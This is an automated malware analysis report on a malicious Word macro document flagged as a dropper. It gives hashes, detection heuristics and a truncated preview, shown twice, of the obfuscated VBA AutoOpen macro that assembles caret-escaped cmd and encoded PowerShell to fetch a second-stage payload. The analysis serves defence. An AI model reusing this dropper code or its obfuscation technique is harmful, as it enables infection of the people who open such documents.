Office (OLE) malware analysis — malicious · a5fd8cb05ab36684

MALICIOUS

Office (OLE)

86.2 KB Created: 2018-08-18 01:14:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 95455a54a020e42a5e0397844241cbed SHA-1: ef299a84d909f486cac5d258f7f17d2f871877cf SHA-256: a5fd8cb05ab36684f977cc5151f0fa125a30951e96ea1ee2edb5d4cf8c310a78

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Valyria-6667982-0. It contains a VBA macro with an AutoOpen function that executes a shell command. The macro appears to be heavily obfuscated, but its intent is to download and execute a second-stage payload, which is a common dropper behavior.

Heuristics 6

ClamAV: Doc.Dropper.Valyria-6667982-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6667982-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43919 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	43919 bytes
SHA-256: `a8e309de92c5fca7d2ea1d27542f42e6d17bd7ef550d3d38e92291ea95db0b7b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iccFcBSZv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KtIiqSZrzjn" Function zDIiQMhj() On Error Resume Next VarType 261065630 IsArray dQzvj bQhLCTlt = "Md /v" + "^ " + " ^" + " /C " + " " VarType Round(Vziqbz) VarType Cos(6806 * uzMij * 15814 / FMcAhY) QNzDNG = CStr(Chr(QzHTANLWficQ + kFJFYwu + 34 + TRfzArCfjOzz + RncSIjJhU)) + " " + "Set^ ^ " + " ^I^" + "F^=xo^" + "@^{r" + "^}[{^l^" SJiuRf = CVar(7) VarType hBNNa urcflNfP = "l " + "-^{^ ^" + "JA^B^" + "QAE(" + "^AU^@" + "A^%^" + "A^G4" + "AZ^QB" + "3AC^0Ab" + "@BiAGo" VarType CVar(29276969) VarType 63 SJiuRf = GuFjBk GdmMuDzrkw = "^A^Z" + "QBj^A" + "^H^Q" + "^A#A^" + "B^O^A^G" + "^U^A^d^" IsArray Second(adcVa + tAhvkf * 74368 + CVjbk) VarType WvsqE SJiuRf = 3250 rsVRJU = "A" + "^A^uA" + "Fc" + "AZ^QB^" + "i^AE" + "^M^" + "A" + "b^AB" + "^x^A" + "^G^UAb" SJiuRf = Fix(44060 * MVkUi) VarType TimeValue(qIPwwl) hjjoBaooViw = "g^B" + "0^" + "AD^}A^J" + "^A" + "B^aAE" + "MA^d^@^" + "A^%" + "^ACc^" + "Aa^AB" VarType Round(FBGAK) SJiuRf = Log(258643195) anIKGoWcMX = "^" + "0A^" + "HQAcAA^" + "6^AC" + "(A^L@^" SJiuRf = Cos(50225 * PUlMf - lNLAwO / 47311) SJiuRf = 31 sOFrkjIvGcG = "B+AH^#" + "A^" + "Z^Q^" + "Bz" + "^AG" + "g^Abg" + "^B^}^" + "A" IsArray CDate(JFfzFw) SJiuRf = CDate(RjhmQ + bbnti - 80726 - zKcLAH) wazXG = "^G" + "^EA" + "^d^Q^B" + "u^AGQA" + "c^gB" VarType 747 SJiuRf = CDec(ciYrAG) SJiuRf = 4 iAJTTbFTLTM = "^5^AC^" + "4A^Y" + "@BvAG0" + "A^L@B^" + "'^" + "A^G^0^A" + "VQ^BA^" + "AG" + "gA" + "d^AB^0" + "^AHA^" SJiuRf = Month(ZlGvP) SJiuRf = CBool(2) QrLUzqUK = "A" + "^Og^" + "Av" + "AC(AY^" + "gBy^AGE" + "AdgB^l^" + "AHc^A" + "^a" + "QB" + "^}^A" VarType 516857644 VarType Month(121588101) maBNzNDnz = "^" + "G@" + "AL^g^Bv" + "^AH^#^" + "A^" zDIiQMhj = bQhLCTlt + QNzDNG + urcflNfP + GdmMuDzrkw + rsVRJU + hjjoBaooViw + anIKGoWcMX + sOFrkjIvGcG + wazXG + iAJTTbFTLTM + QrLUzqUK + maBNzNDnz VarType 3 VarType TimeValue(5) VarType 6 End Function Function FhRMjqmQm() On Error Resume Next SJiuRf = Cos(52492 * pLXRX) IsArray CDbl(ARGwD) IsArray HLvRk KIMmoOa = "Z^@Av^A" + "D" + "UA" + "Vg^BL^A" + "^EEA" + "aAB^" + "yAEAAa^" + "AB^0" + "A^HQA" + "cA" + "^A^6^A" + "C(^" VarType Sin(2177 + 80601 / SjmERk / sikzh) VarType Str(7231) VarType cUGiIR mhBEG = "A^" + "L^@B^5^" + "AHAAc" + "@^B^" + "x^A^" + "G^Y" + "A^ZQB^" + "zA" VarType REsZXH IsArray Cos(VpwoKM) IsArray FDZFbZ twqKJu = "^HQAL^" + "gB^" + "jAG(AbQ" + "^" + "Av^" + "AHg^AY" + "^g^B" SJiuRf = Round(IwTWjP * EHmNsa / WIIMj - wRHXzD) VarType 9455 itQUo = "^yAF" + "^" + "k^A^b^" + "@^" + "B^A^AGg" + "^A^d^A^" VarType sRXvP IsArray Hex(3) FnbOYXQHji = "B0^AHAA" + "^" + "O^gAvA" + "C" + "(^" + "Ab" + "^g" + "B[" + "^A^H^o^" + "A^Y^Q" SJiuRf = Second(ZSjCaU) VarType 85742947 IsArray CzSMDs jEjiwIfzwR = "^B^y^" + "A^" + "HM^A" + "cABv" + "^A" + "H^Q^A" + "^" + "L^gB" + "^jA^G(" + "A" VarType Tan(vZdBTj) VarType Sqr(8) VarType Tan(3) rahjzBz = "bQAu^" + "A^H" + "^QAc^" + "gA" + "v" + "A^GQ" + "^AV^A^" + "Bv^AGY^" + "AQQ" + "^A^" SJiuRf = Val(59808 - NzqYK - 18785 - PhDIY) IsArray CStr(blfOi) duVaaDdP = "zA^EAAa" + "^" + "A^B^0A" + "^HQA" + "cA" + "^A6AC(^" + "AL@Bz^A" IsArray MrKXw VarType fYTzco SJiuRf = Sin(329) CpjpqY = "^HU" + "^A^" + "a" + "^Q^B" + "j" + "^AGkA^" + "Z^A^B" + "^l" + "^A^HA^A" IsArray 2 SJiuRf = 997 SJiuRf = CCur(aJsRE) VzqJj = "cgBlAHY" + "^A^" + "ZQB" + "^u^A^HQ" + "A" + "^a" + "^Q^" + "Bv^A^G" + "^4^" VarType Oct(nzNmLM) IsArray CDate(SPhqO) hihZf = "Ac^A" + "BvA^" + "H#Ad" + "A" + "^B^[A^" + "GcAZ" + "^Q^" + "Bj^A^G" + "(^AdQ" + "^B^u^A" + "H^QA" + "{QA" SJiuRf = 3232 SJiuRf = Fix(58307 + ZCWdKr) IsArray 32 dhFwUCBmB = "^u^AG(^" + "Ac" + "g^" + "Bn^AC(" ... (truncated)

SHA-256: a8e309de92c5fca7d2ea1d27542f42e6d17bd7ef550d3d38e92291ea95db0b7b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iccFcBSZv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KtIiqSZrzjn"
Function zDIiQMhj()
On Error Resume Next
VarType 261065630
   IsArray dQzvj
bQhLCTlt = "Md  /v" + "^ " + " ^" + "   /C " + "  "
VarType Round(Vziqbz)
   VarType Cos(6806 * uzMij * 15814 / FMcAhY)
QNzDNG = CStr(Chr(QzHTANLWficQ + kFJFYwu + 34 + TRfzArCfjOzz + RncSIjJhU)) + " " + "Set^ ^ " + " ^I^" + "F^=xo^" + "@^{r" + "^}[{^l^"
SJiuRf = CVar(7)
   VarType hBNNa
urcflNfP = "l " + "-^{^ ^" + "JA^B^" + "QAE(" + "^AU^@" + "A^%^" + "A^G4" + "AZ^QB" + "3AC^0Ab" + "@BiAGo"
VarType CVar(29276969)
   VarType 63
   SJiuRf = GuFjBk
GdmMuDzrkw = "^A^Z" + "QBj^A" + "^H^Q" + "^A#A^" + "B^O^A^G" + "^U^A^d^"
IsArray Second(adcVa + tAhvkf * 74368 + CVjbk)
   VarType WvsqE
   SJiuRf = 3250
rsVRJU = "A" + "^A^uA" + "Fc" + "AZ^QB^" + "i^AE" + "^M^" + "A" + "b^AB" + "^x^A" + "^G^UAb"
SJiuRf = Fix(44060 * MVkUi)
   VarType TimeValue(qIPwwl)
hjjoBaooViw = "g^B" + "0^" + "AD^}A^J" + "^A" + "B^aAE" + "MA^d^@^" + "A^%" + "^ACc^" + "Aa^AB"
VarType Round(FBGAK)
   SJiuRf = Log(258643195)
anIKGoWcMX = "^" + "0A^" + "HQAcAA^" + "6^AC" + "(A^L@^"
SJiuRf = Cos(50225 * PUlMf - lNLAwO / 47311)
   SJiuRf = 31
sOFrkjIvGcG = "B+AH^#" + "A^" + "Z^Q^" + "Bz" + "^AG" + "g^Abg" + "^B^}^" + "A"
IsArray CDate(JFfzFw)
   SJiuRf = CDate(RjhmQ + bbnti - 80726 - zKcLAH)
wazXG = "^G" + "^EA" + "^d^Q^B" + "u^AGQA" + "c^gB"
VarType 747
   SJiuRf = CDec(ciYrAG)
   SJiuRf = 4
iAJTTbFTLTM = "^5^AC^" + "4A^Y" + "@BvAG0" + "A^L@B^" + "'^" + "A^G^0^A" + "VQ^BA^" + "AG" + "gA" + "d^AB^0" + "^AHA^"
SJiuRf = Month(ZlGvP)
   SJiuRf = CBool(2)
QrLUzqUK = "A" + "^Og^" + "Av" + "AC(AY^" + "gBy^AGE" + "AdgB^l^" + "AHc^A" + "^a" + "QB" + "^}^A"
VarType 516857644
   VarType Month(121588101)
maBNzNDnz = "^" + "G@" + "AL^g^Bv" + "^AH^#^" + "A^"
zDIiQMhj = bQhLCTlt + QNzDNG + urcflNfP + GdmMuDzrkw + rsVRJU + hjjoBaooViw + anIKGoWcMX + sOFrkjIvGcG + wazXG + iAJTTbFTLTM + QrLUzqUK + maBNzNDnz
   VarType 3
   VarType TimeValue(5)
   VarType 6
End Function
Function FhRMjqmQm()
On Error Resume Next
SJiuRf = Cos(52492 * pLXRX)
   IsArray CDbl(ARGwD)
   IsArray HLvRk
KIMmoOa = "Z^@Av^A" + "D" + "UA" + "Vg^BL^A" + "^EEA" + "aAB^" + "yAEAAa^" + "AB^0" + "A^HQA" + "cA" + "^A^6^A" + "C(^"
VarType Sin(2177 + 80601 / SjmERk / sikzh)
   VarType Str(7231)
   VarType cUGiIR
mhBEG = "A^" + "L^@B^5^" + "AHAAc" + "@^B^" + "x^A^" + "G^Y" + "A^ZQB^" + "zA"
VarType REsZXH
   IsArray Cos(VpwoKM)
   IsArray FDZFbZ
twqKJu = "^HQAL^" + "gB^" + "jAG(AbQ" + "^" + "Av^" + "AHg^AY" + "^g^B"
SJiuRf = Round(IwTWjP * EHmNsa / WIIMj - wRHXzD)
   VarType 9455
itQUo = "^yAF" + "^" + "k^A^b^" + "@^" + "B^A^AGg" + "^A^d^A^"
VarType sRXvP
   IsArray Hex(3)
FnbOYXQHji = "B0^AHAA" + "^" + "O^gAvA" + "C" + "(^" + "Ab" + "^g" + "B[" + "^A^H^o^" + "A^Y^Q"
SJiuRf = Second(ZSjCaU)
   VarType 85742947
   IsArray CzSMDs
jEjiwIfzwR = "^B^y^" + "A^" + "HM^A" + "cABv" + "^A" + "H^Q^A" + "^" + "L^gB" + "^jA^G(" + "A"
VarType Tan(vZdBTj)
   VarType Sqr(8)
   VarType Tan(3)
rahjzBz = "bQAu^" + "A^H" + "^QAc^" + "gA" + "v" + "A^GQ" + "^AV^A^" + "Bv^AGY^" + "AQQ" + "^A^"
SJiuRf = Val(59808 - NzqYK - 18785 - PhDIY)
   IsArray CStr(blfOi)
duVaaDdP = "zA^EAAa" + "^" + "A^B^0A" + "^HQA" + "cA" + "^A6AC(^" + "AL@Bz^A"
IsArray MrKXw
   VarType fYTzco
   SJiuRf = Sin(329)
CpjpqY = "^HU" + "^A^" + "a" + "^Q^B" + "j" + "^AGkA^" + "Z^A^B" + "^l" + "^A^HA^A"
IsArray 2
   SJiuRf = 997
   SJiuRf = CCur(aJsRE)
VzqJj = "cgBlAHY" + "^A^" + "ZQB" + "^u^A^HQ" + "A" + "^a" + "^Q^" + "Bv^A^G" + "^4^"
VarType Oct(nzNmLM)
   IsArray CDate(SPhqO)
hihZf = "Ac^A" + "BvA^" + "H#Ad" + "A" + "^B^[A^" + "GcAZ" + "^Q^" + "Bj^A^G" + "(^AdQ" + "^B^u^A" + "H^QA" + "{QA"
SJiuRf = 3232
   SJiuRf = Fix(58307 + ZCWdKr)
   IsArray 32
dhFwUCBmB = "^u^AG(^" + "Ac" + "g^" + "Bn^AC("
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.